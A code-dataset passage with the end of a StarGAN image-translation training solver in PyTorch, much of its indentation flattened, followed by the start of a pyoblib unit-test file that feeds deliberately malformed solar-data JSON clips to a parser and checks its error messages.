self.d_optimizer = torch.optim.Adam(self.D.parameters(), self.d_lr, [self.beta1, self.beta2])
self.print_network(self.G, 'G')
self.print_network(self.D, 'D')
self.G.to(self.device)
self.D.to(self.device)
def print_network(self, model, name):
"""Print out the network information."""
num_params = 0
for p in model.parameters():
num_params += p.numel()
print(model)
print(name)
print("The number of parameters: {}".format(num_params))
def restore_model(self, resume_iters):
"""Restore the trained generator and discriminator."""
print('Loading the trained models from step {}...'.format(resume_iters))
G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(resume_iters))
D_path = os.path.join(self.model_save_dir, '{}-D.ckpt'.format(resume_iters))
self.G.load_state_dict(torch.load(G_path, map_location=lambda storage, loc: storage))
self.D.load_state_dict(torch.load(D_path, map_location=lambda storage, loc: storage))
def build_tensorboard(self):
"""Build a tensorboard logger."""
from logger import Logger
self.logger = Logger(self.log_dir)
def update_lr(self, g_lr, d_lr):
"""Decay learning rates of the generator and discriminator."""
for param_group in self.g_optimizer.param_groups:
param_group['lr'] = g_lr
for param_group in self.d_optimizer.param_groups:
param_group['lr'] = d_lr
def reset_grad(self):
"""Reset the gradient buffers."""
self.g_optimizer.zero_grad()
self.d_optimizer.zero_grad()
def denorm(self, x):
"""Convert the range from [-1, 1] to [0, 1]."""
out = (x + 1) / 2
return out.clamp_(0, 1)
def gradient_penalty(self, y, x):
"""Compute gradient penalty: (L2_norm(dy/dx) - 1)**2."""
weight = torch.ones(y.size()).to(self.device)
dydx = torch.autograd.grad(outputs=y,
inputs=x,
grad_outputs=weight,
retain_graph=True,
create_graph=True,
only_inputs=True)[0]
dydx = dydx.view(dydx.size(0), -1)
dydx_l2norm = torch.sqrt(torch.sum(dydx**2, dim=1))
return torch.mean((dydx_l2norm-1)**2)
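    # (Illustrative note) This is the WGAN-GP term: for x_hat sampled on the
    # line between real and fake images, gradient_penalty returns
    #     E[(||dD(x_hat)/dx_hat||_2 - 1)^2],
    # which train() adds to the critic loss scaled by lambda_gp.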
def label2onehot(self, labels, dim):
"""Convert label indices to one-hot vectors."""
batch_size = labels.size(0)
out = torch.zeros(batch_size, dim)
out[np.arange(batch_size), labels.long()] = 1
return out
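    # Example (illustrative): label2onehot(torch.tensor([2., 0.]), dim=4)
    # returns [[0., 0., 1., 0.], [1., 0., 0., 0.]].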
def create_labels(self, c_org, c_dim=5, dataset='CelebA', selected_attrs=None):
"""Generate target domain labels for debugging and testing."""
# Get hair color indices.
if dataset == 'CelebA':
hair_color_indices = []
for i, attr_name in enumerate(selected_attrs):
if attr_name in ['Black_Hair', 'Blond_Hair', 'Brown_Hair', 'Gray_Hair']:
hair_color_indices.append(i)
c_trg_list = []
for i in range(c_dim):
if dataset == 'CelebA':
c_trg = c_org.clone()
if i in hair_color_indices: # Set one hair color to 1 and the rest to 0.
c_trg[:, i] = 1
for j in hair_color_indices:
if j != i:
c_trg[:, j] = 0
else:
c_trg[:, i] = (c_trg[:, i] == 0) # Reverse attribute value.
elif dataset == 'RaFD':
c_trg = self.label2onehot(torch.ones(c_org.size(0))*i, c_dim)
c_trg_list.append(c_trg.to(self.device))
return c_trg_list
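    # Example (illustrative): with selected_attrs = ['Black_Hair', 'Blond_Hair',
    # 'Male'], target i=0 sets Black_Hair to 1 and zeroes the other hair color,
    # while target i=2 simply flips the binary Male attribute; RaFD targets are
    # plain one-hot expression labels instead.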
def classification_loss(self, logit, target, dataset='CelebA'):
"""Compute binary or softmax cross entropy loss."""
if dataset == 'CelebA':
return F.binary_cross_entropy_with_logits(logit, target, size_average=False) / logit.size(0)
elif dataset == 'RaFD':
return F.cross_entropy(logit, target)
def train(self):
"""Train StarGAN within a single dataset."""
# Set data loader.
if self.dataset == 'CelebA':
data_loader = self.celeba_loader
elif self.dataset == 'RaFD':
data_loader, _ = self.rafd_loader
# Fetch fixed inputs for debugging.
data_iter = iter(data_loader)
x_fixed, c_org = next(data_iter)
x_fixed = x_fixed.to(self.device)
c_fixed_list = self.create_labels(c_org, self.c_dim, self.dataset, self.selected_attrs)
# Learning rate cache for decaying.
g_lr = self.g_lr
d_lr = self.d_lr
# Start training from scratch or resume training.
start_iters = 0
if self.resume_iters:
start_iters = self.resume_iters
self.restore_model(self.resume_iters)
# Start training.
print('Start training...')
start_time = time.time()
for i in range(start_iters, self.num_iters):
# =================================================================================== #
# 1. Preprocess input data #
# =================================================================================== #
# Fetch real images and labels.
try:
x_real, label_org = next(data_iter)
except:
data_iter = iter(data_loader)
x_real, label_org = next(data_iter)
# Generate target domain labels randomly.
rand_idx = torch.randperm(label_org.size(0))
label_trg = label_org[rand_idx]
if self.dataset == 'CelebA':
c_org = label_org.clone()
c_trg = label_trg.clone()
elif self.dataset == 'RaFD':
c_org = self.label2onehot(label_org, self.c_dim)
c_trg = self.label2onehot(label_trg, self.c_dim)
x_real = x_real.to(self.device) # Input images.
c_org = c_org.to(self.device) # Original domain labels.
c_trg = c_trg.to(self.device) # Target domain labels.
label_org = label_org.to(self.device) # Labels for computing classification loss.
label_trg = label_trg.to(self.device) # Labels for computing classification loss.
# =================================================================================== #
# 2. Train the discriminator #
# =================================================================================== #
# Compute loss with real images.
out_src, out_cls = self.D(x_real)
d_loss_real = - torch.mean(out_src)
d_loss_cls = self.classification_loss(out_cls, label_org, self.dataset)
# Compute loss with fake images.
x_fake = self.G(x_real, c_trg)
out_src, out_cls = self.D(x_fake.detach())
d_loss_fake = torch.mean(out_src)
# Compute loss for gradient penalty.
alpha = torch.rand(x_real.size(0), 1, 1, 1).to(self.device)
x_hat = (alpha * x_real.data + (1 - alpha) * x_fake.data).requires_grad_(True)
out_src, _ = self.D(x_hat)
d_loss_gp = self.gradient_penalty(out_src, x_hat)
# Backward and optimize.
d_loss = d_loss_real + d_loss_fake + self.lambda_cls * d_loss_cls + self.lambda_gp * d_loss_gp
self.reset_grad()
d_loss.backward()
self.d_optimizer.step()
# Logging.
loss = {}
loss['D/loss_real'] = d_loss_real.item()
loss['D/loss_fake'] = d_loss_fake.item()
loss['D/loss_cls'] = d_loss_cls.item()
loss['D/loss_gp'] = d_loss_gp.item()
# =================================================================================== #
# 3. Train the generator #
# =================================================================================== #
if (i+1) % self.n_critic == 0:
# Original-to-target domain.
x_fake = self.G(x_real, c_trg)
out_src, out_cls = self.D(x_fake)
g_loss_fake = - torch.mean(out_src)
g_loss_cls = self.classification_loss(out_cls, label_trg, self.dataset)
# Target-to-original domain.
x_reconst = self.G(x_fake, c_org)
g_loss_rec = torch.mean(torch.abs(x_real - x_reconst))
# ===
# Backward and optimize.
modification = torch.mean(x_fake - x_real, dim=(2,3), keepdim=True)
# reminder from debugging
#print(x_fake.size())
#print(x_real.size())
g_loss_lvl = torch.mean(torch.square(x_fake - modification))
lambda_lvl = self.lambda_lvl # you can try smaller or larger value here
g_loss = g_loss_fake + self.lambda_rec * g_loss_rec + self.lambda_cls * g_loss_cls + lambda_lvl * g_loss_lvl
self.reset_grad()
g_loss.backward()
self.g_optimizer.step()
# Logging.
loss['G/loss_fake'] = g_loss_fake.item()
loss['G/loss_rec'] = g_loss_rec.item()
loss['G/loss_cls'] = g_loss_cls.item()
# =================================================================================== #
# 4. Miscellaneous #
# =================================================================================== #
# Print out training information.
if (i+1) % self.log_step == 0:
et = time.time() - start_time
et = str(datetime.timedelta(seconds=et))[:-7]
log = "Elapsed [{}], Iteration [{}/{}]".format(et, i+1, self.num_iters)
for tag, value in loss.items():
log += ", {}: {:.4f}".format(tag, value)
print(log)
if self.use_tensorboard:
for tag, value in loss.items():
self.logger.scalar_summary(tag, value, i+1)
# Translate fixed images for debugging.
if (i+1) % self.sample_step == 0:
with torch.no_grad():
x_fake_list = [x_fixed]
for c_fixed in c_fixed_list:
x_fake_list.append(self.G(x_fixed, c_fixed))
x_concat = torch.cat(x_fake_list, dim=3)
sample_path = os.path.join(self.sample_dir, '{}-images.jpg'.format(i+1))
save_image(self.denorm(x_concat.data.cpu()), sample_path, nrow=1, padding=0)
print('Saved real and fake images into {}...'.format(sample_path))
# Save model checkpoints.
if (i+1) % self.model_save_step == 0:
G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(i+1))
D_path = os.path.join(self.model_save_dir, '{}-D.ckpt'.format(i+1))
torch.save(self.G.state_dict(), G_path)
torch.save(self.D.state_dict(), D_path)
print('Saved model checkpoints into {}...'.format(self.model_save_dir))
# Decay learning rates.
if (i+1) % self.lr_update_step == 0 and (i+1) > (self.num_iters - self.num_iters_decay):
g_lr -= (self.g_lr / float(self.num_iters_decay))
d_lr -= (self.d_lr / float(self.num_iters_decay))
self.update_lr(g_lr, d_lr)
print ('Decayed learning rates, g_lr: {}, d_lr: {}.'.format(g_lr, d_lr))
def train_multi(self):
"""Train StarGAN with multiple datasets."""
# Data iterators.
celeba_iter = iter(self.celeba_loader)
rafd_iter = iter(self.rafd_loader)
# Fetch fixed inputs for debugging.
x_fixed, c_org = next(celeba_iter)
x_fixed = x_fixed.to(self.device)
c_celeba_list = self.create_labels(c_org, self.c_dim, 'CelebA', self.selected_attrs)
c_rafd_list = self.create_labels(c_org, self.c2_dim, 'RaFD')
zero_celeba = torch.zeros(x_fixed.size(0), self.c_dim).to(self.device) # Zero vector for CelebA.
zero_rafd = torch.zeros(x_fixed.size(0), self.c2_dim).to(self.device) # Zero vector for RaFD.
mask_celeba = self.label2onehot(torch.zeros(x_fixed.size(0)), 2).to(self.device) # Mask vector: [1, 0].
mask_rafd = self.label2onehot(torch.ones(x_fixed.size(0)), 2).to(self.device) # Mask vector: [0, 1].
# Learning rate cache for decaying.
g_lr = self.g_lr
d_lr = self.d_lr
# Start training from scratch or resume training.
start_iters = 0
if self.resume_iters:
start_iters = self.resume_iters
self.restore_model(self.resume_iters)
# Start training.
print('Start training...')
start_time = time.time()
for i in range(start_iters, self.num_iters):
for dataset in ['CelebA', 'RaFD']:
# =================================================================================== #
# 1. Preprocess input data #
# =================================================================================== #
# Fetch real images and labels.
data_iter = celeba_iter if dataset == 'CelebA' else rafd_iter
try:
x_real, label_org = next(data_iter)
except:
if dataset == 'CelebA':
celeba_iter = iter(self.celeba_loader)
x_real, label_org = next(celeba_iter)
elif dataset == 'RaFD':
rafd_iter = iter(self.rafd_loader)
x_real, label_org = next(rafd_iter)
# Generate target domain labels randomly.
rand_idx = torch.randperm(label_org.size(0))
label_trg = label_org[rand_idx]
if dataset == 'CelebA':
c_org = label_org.clone()
c_trg = label_trg.clone()
zero = torch.zeros(x_real.size(0), self.c2_dim)
mask = self.label2onehot(torch.zeros(x_real.size(0)), 2)
c_org = torch.cat([c_org, zero, mask], dim=1)
c_trg = torch.cat([c_trg, zero, mask], dim=1)
elif dataset == 'RaFD':
c_org = self.label2onehot(label_org, self.c2_dim)
c_trg = self.label2onehot(label_trg, self.c2_dim)
zero = torch.zeros(x_real.size(0), self.c_dim)
mask = self.label2onehot(torch.ones(x_real.size(0)), 2)
c_org = torch.cat([zero, c_org, mask], dim=1)
c_trg = torch.cat([zero, c_trg, mask], dim=1)
x_real = x_real.to(self.device) # Input images.
c_org = c_org.to(self.device) # Original domain labels.
c_trg = c_trg.to(self.device) # Target domain labels.
label_org = label_org.to(self.device) # Labels for computing classification loss.
label_trg = label_trg.to(self.device) # Labels for computing classification loss.
# =================================================================================== #
# 2. Train the discriminator #
# =================================================================================== #
# Compute loss with real images.
out_src, out_cls = self.D(x_real)
out_cls = out_cls[:, :self.c_dim] if dataset == 'CelebA' else out_cls[:, self.c_dim:]
d_loss_real = - torch.mean(out_src)
d_loss_cls = self.classification_loss(out_cls, label_org, dataset)
# Compute loss with fake images.
x_fake = self.G(x_real, c_trg)
out_src, _ = self.D(x_fake.detach())
d_loss_fake = torch.mean(out_src)
# Compute loss for gradient penalty.
alpha = torch.rand(x_real.size(0), 1, 1, 1).to(self.device)
x_hat = (alpha * x_real.data + (1 - alpha) * x_fake.data).requires_grad_(True)
out_src, _ = self.D(x_hat)
d_loss_gp = self.gradient_penalty(out_src, x_hat)
# Backward and optimize.
d_loss = d_loss_real + d_loss_fake + self.lambda_cls * d_loss_cls + self.lambda_gp * d_loss_gp
self.reset_grad()
d_loss.backward()
self.d_optimizer.step()
# Logging.
loss = {}
loss['D/loss_real'] = d_loss_real.item()
loss['D/loss_fake'] = d_loss_fake.item()
loss['D/loss_cls'] = d_loss_cls.item()
loss['D/loss_gp'] = d_loss_gp.item()
# =================================================================================== #
# 3. Train the generator #
# =================================================================================== #
if (i+1) % self.n_critic == 0:
# Original-to-target domain.
x_fake = self.G(x_real, c_trg)
out_src, out_cls = self.D(x_fake)
out_cls = out_cls[:, :self.c_dim] if dataset == 'CelebA' else out_cls[:, self.c_dim:]
g_loss_fake = - torch.mean(out_src)
g_loss_cls = self.classification_loss(out_cls, label_trg, dataset)
# Target-to-original domain.
x_reconst = self.G(x_fake, c_org)
g_loss_rec = torch.mean(torch.abs(x_real - x_reconst))
# Backward and optimize.
g_loss = g_loss_fake + self.lambda_rec * g_loss_rec + self.lambda_cls * g_loss_cls
self.reset_grad()
g_loss.backward()
self.g_optimizer.step()
# Logging.
loss['G/loss_fake'] = g_loss_fake.item()
loss['G/loss_rec'] = g_loss_rec.item()
loss['G/loss_cls'] = g_loss_cls.item()
# =================================================================================== #
# 4. Miscellaneous #
# =================================================================================== #
# Print out training info.
if (i+1) % self.log_step == 0:
et = time.time() - start_time
et = str(datetime.timedelta(seconds=et))[:-7]
log = "Elapsed [{}], Iteration [{}/{}], Dataset [{}]".format(et, i+1, self.num_iters, dataset)
for tag, value in loss.items():
log += ", {}: {:.4f}".format(tag, value)
print(log)
if self.use_tensorboard:
for tag, value in loss.items():
self.logger.scalar_summary(tag, value, i+1)
# Translate fixed images for debugging.
if (i+1) % self.sample_step == 0:
with torch.no_grad():
x_fake_list = [x_fixed]
for c_fixed in c_celeba_list:
c_trg = torch.cat([c_fixed, zero_rafd, mask_celeba], dim=1)
x_fake_list.append(self.G(x_fixed, c_trg))
for c_fixed in c_rafd_list:
c_trg = torch.cat([zero_celeba, c_fixed, mask_rafd], dim=1)
x_fake_list.append(self.G(x_fixed, c_trg))
x_concat = torch.cat(x_fake_list, dim=3)
sample_path = os.path.join(self.sample_dir, '{}-images.jpg'.format(i+1))
save_image(self.denorm(x_concat.data.cpu()), sample_path, nrow=1, padding=0)
print('Saved real and fake images into {}...'.format(sample_path))
# Save model checkpoints.
if (i+1) % self.model_save_step == 0:
G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(i+1))
D_path = os.path.join(self.model_save_dir, '{}-D.ckpt'.format(i+1))
torch.save(self.G.state_dict(), G_path)
torch.save(self.D.state_dict(), D_path)
print('Saved model checkpoints into {}...'.format(self.model_save_dir))
# Decay learning rates.
if (i+1) % self.lr_update_step == 0 and (i+1) > (self.num_iters - self.num_iters_decay):
g_lr -= (self.g_lr / float(self.num_iters_decay))
d_lr -= (self.d_lr / float(self.num_iters_decay))
self.update_lr(g_lr, d_lr)
print ('Decayed learning rates, g_lr: {}, d_lr: {}.'.format(g_lr, d_lr))
def test(self):
"""Translate images using StarGAN trained on a single dataset."""
# Load the trained generator.
self.restore_model(self.test_iters)
# Set data loader.
if self.dataset == 'CelebA':
data_loader = self.celeba_loader
elif self.dataset == 'RaFD':
data_loader, imgnames = self.rafd_loader
with torch.no_grad():
for i, (x_real, c_org) in enumerate(data_loader):
# Prepare input images and target domain labels.
#print("X REAL START")
#print(x_real)
x_real = x_real.to(self.device)
# print("X REAL END")
c_trg_list = self.create_labels(c_org, self.c_dim, self.dataset, self.selected_attrs)
#print(i)
# print("that was i")
#print(c_org) <- original c domain
# Translate images.
x_fake_list = [x_real]
for c_trg in c_trg_list:
                    p1 = os.path.join(self.result_dir, '{}-images.png'.format(i+1))
# print(self.G(x_real, c_trg)) ctarget
# print(x_real)
# c_trg is tensor w/ boolean 0 1, 1 if converting to that batch
# has height 16 for 16 images
# print(c_trg)
x_fake_list.append(self.G(x_real, c_trg))
# Save the translated images.
x_concat = torch.cat(x_fake_list, dim=3)
# print("x_concat")
# print(x_concat)
# print(x_concat.shape)
# print("x_fake_list")
# print(x_fake_list[0])
# print(torch.min(x_fake_list[0]))
# with one image, torch.Size([1, 3, 128, 512]) for x_concat
# print(torch.max(x_fake_list[0])) tensor(-0.7412)
# print(torch.min(x_fake_list[0])) tensor(-1)
# with one image, torch.Size([1, 3, 128, 128]) for x_fake_list[0]
og_image_name = os.path.basename(self.result_dir)
#print(x_concat)
result_path = os.path.join(self.result_dir, og_image_name+'-{}-images.png'.format(i+1))
result_path2 = os.path.join(self.result_dir,'{}-imageseeee.png'.format(i+1))
save_image(self.denorm(x_concat.data.cpu()), result_path, nrow=1, padding=0)
#print(x_real[1,:,:,:])
#print(x_concat.size())
# x_concat.size() = torch.Size([16, 3, 128, 1280])
# shoot, will maybe need to break this up?
# list of images (vertically)
num_imgs = list(x_real.size())[0] # will always be 8 with the current settings (09-21-2020) UNLESS you're at the end of the batch, where it can be < 8
img_size =list(x_real.size())[2] # will always be 128 as long as I keep my settings
full_im_width = list(x_concat.size())[3] # width of the combined images
num_batches = full_im_width/img_size # number of batches (includes real)
                # Cut the strip into one file per image (q) and per domain
                # column (w); column 0 is the unmodified input. Each domain
                # column gets its own batch<w> subdirectory.
                for q in range(0, num_imgs):
                    for w in range(0, int(num_batches)):
                        subdirname = os.path.join(self.result_dir, 'batch' + str(w))
                        if not os.path.exists(subdirname):
                            os.mkdir(subdirname)

                        # Slice this image's w-th column out of the strip.
                        start_dim = w * img_size
                        end_dim = (w+1) * img_size
                        current_img_batch = x_concat[q, :, :, start_dim:end_dim]

                        # Recover the source file name so the output can be
                        # traced back to its original image (imgnames comes from
                        # the RaFD loader above).
                        original_image_path = imgnames[q + (i * self.batch_size)]
                        original_image_name = os.path.split(original_image_path[0])[-1]
                        new_result_path = os.path.join(subdirname, 'B{}_'.format(w) + original_image_name)

                        # Save as a 16-bit PNG via OpenCV. Beware: routing values
                        # up to 65535 through torch.int16 is implementation-defined
                        # for pixels above 32767; casting to int32 before
                        # astype(np.uint16) would be safer.
                        grid = make_grid(self.denorm(current_img_batch.data.cpu()))
                        ndarr = grid.mul(65535).add_(0.5).clamp_(0, 65535).permute(1, 2, 0).to('cpu', torch.int16).numpy()
                        cv2.imwrite(new_result_path, ndarr.astype(np.uint16))

                print('Saved real and fake images into {}...'.format(result_path))
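    # A minimal standalone sketch of the 16-bit save path used in test() above,
    # assuming a tensor img in [-1, 1] of shape [3, H, W] (the names here are
    # illustrative, not part of the original solver):
    #
    #   img16 = ((img + 1) / 2).mul(65535).clamp(0, 65535)
    #   ndarr = img16.permute(1, 2, 0).to('cpu', torch.int32).numpy().astype(np.uint16)
    #   cv2.imwrite('out.png', ndarr)
    #
    # Going through int32 avoids the int16 overflow noted above.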
def test_multi(self):
"""Translate images using StarGAN trained on multiple datasets."""
# Load the trained generator.
self.restore_model(self.test_iters)
with torch.no_grad():
for i, (x_real, c_org) in enumerate(self.celeba_loader):
# Prepare input images and target domain labels.
x_real = x_real.to(self.device)
c_celeba_list = self.create_labels(c_org, self.c_dim, 'CelebA', self.selected_attrs)
c_rafd_list = self.create_labels(c_org, self.c2_dim, 'RaFD')
zero_celeba = torch.zeros(x_real.size(0), self.c_dim).to(self.device) # Zero vector for CelebA.
zero_rafd = torch.zeros(x_real.size(0), self.c2_dim).to(self.device) # Zero vector for RaFD.
mask_celeba = self.label2onehot(torch.zeros(x_real.size(0)), 2).to(self.device) # Mask vector: [1, 0].
mask_rafd = self.label2onehot(torch.ones(x_real.size(0)), 2).to(self.device) # Mask vector: [0, 1].
# Translate images.
x_fake_list = [x_real]
for c_celeba in c_celeba_list:
c_trg = torch.cat([c_celeba, zero_rafd, mask_celeba], dim=1)
x_fake_list.append(self.G(x_real, c_trg))
for c_rafd in c_rafd_list:
c_trg = torch.cat([zero_celeba, c_rafd, mask_rafd], dim=1)
x_fake_list.append(self.G(x_real, c_trg))
# Save the translated images.
x_concat = torch.cat(x_fake_list, dim=3)
result_path = os.path.join(self.result_dir, '{}-images.jpg'.format(i+1))
save_image(self.denorm(x_concat.data.cpu()), result_path, nrow=1, padding=0)
print('Saved real and fake images into {}...'.format(result_path))
| 49.790831 | 166 | 0.508776 |

794dbd4a4984846367c3a9606fbdc3f433cabd55 | 135,885 | py | Python
oblib/tests/test_json_clips.py | michael-bbs/pyoblib | f7f11d455809d80b7701fa89b69995dc703dfbab | ["Apache-2.0"] | null | null | null
# Copyright 2018 SunSpec Alliance
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from inspect import currentframe
import unittest
import parser
import taxonomy
import pytest
# Module-level fixtures; note these assignments shadow the imported module names.
taxonomy = taxonomy.Taxonomy()
parser = parser.Parser(taxonomy)
def _ln():
# Returns line number of caller.
cf = currentframe()
return cf.f_back.f_lineno
class TestJsonClips(unittest.TestCase):
    # Note: this module is tested differently than others. Erroneous JSON clips are run through
    # the parser's validator method and should cause various error messages to be produced. The
    # resulting exception string is expected to match a regular expression, which should prove
    # that enough information is returned to correctly diagnose the error (although a perfect
    # match is not necessarily required unless the expression demands it). A line number in the
    # JSON is also present, and in an ideal world that line number should also be decipherable
    # from the parser.
def test_clips(self):
failure_list = []
for clip in CLIPS:
try:
parser.from_JSON_string(JSON_HEADER + clip[4] + JSON_FOOTER, entrypoint_name=clip[1])
if clip[2] is not None:
failure_list.append("Case {} did not cause a failure condition as expected".format(clip[0]))
except Exception as e:
s = str(e)
if clip[2] is None:
failure_list.append("Case {} should have succeeded, raised {}".format(clip[0], s))
elif re.search(clip[2], s, re.IGNORECASE) is None:
failure_list.append("Case {} exception text '{}' did not meet expected value '{}'".format(clip[0], s, clip[2]))
if len(failure_list) > 0:
msg = "\n"
for f in failure_list:
msg = msg + f + "\n"
            # TODO: Uncomment the self.fail call below and remove the print statement. The
            # validator rules are not implemented yet, so this test cannot actually fail,
            # although in reality it should.
            # self.fail(msg)
            print(msg)
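# Each CLIPS entry below follows the layout implied by its use in test_clips:
#   [source line (via _ln), entrypoint name, expected error regex (the string
#    "None" marks cases expected to succeed), expected error line in the JSON,
#    JSON clip string]
# Note that the "expected to succeed" entries use the *string* "None", while
# test_clips compares clip[2] against the None literal with "is None"; as
# written, those cases are therefore still treated as expected failures.
#
# A minimal sketch of the matching rule (illustrative values):
#   msg = "Identifier is not a uuid"
#   assert re.search("Identifier is not a uuid", msg, re.IGNORECASE) is not None
# Partial, case-insensitive matches are accepted, mirroring the re.search call
# in test_clips.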
CLIPS = [
[_ln(), "MonthlyOperatingReport", "Identifier is not a uuid", 1, """
{
"illegal-identifier": {
"value": "93.26",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Float expected", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Bad Data",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "is not a writeable concept", 4, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Bad Data",
"aspects": {
"concept": 2,
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Entity is not a string", 5, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Bad Data",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": 3,
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Illegal Period Start", 6, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "93.26",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": "JUPITER",
"period": "2017-13-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Illegal Period End", 7, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "93.26",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-13-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Identifier is not a uuid", 1, """
{
"illegal-identifier": {
"value": "93.26",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Value is missing", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Aspects is missing", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "93.26"
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Concept is missing", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "93.26",
"aspects": {
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Entity is missing", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "93.26",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MasterPurchaseAgreement", "Non-nillable value is set to null", 3, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": null,
"aspects": {
"concept": "solar:PreparerOfMasterPurchaseAgreement",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
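    # --- xbrli:booleanItemType: only "True"/"False" are legal; other spellings and numerics are rejected. ---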
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "True",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "non-boolean",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "true",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "false",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "1",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "0",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "1.0",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "0.0",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
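    # --- xbrli:dateItemType: month-end boundaries and leap years accepted; malformed or impossible dates rejected. ---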
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-01-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
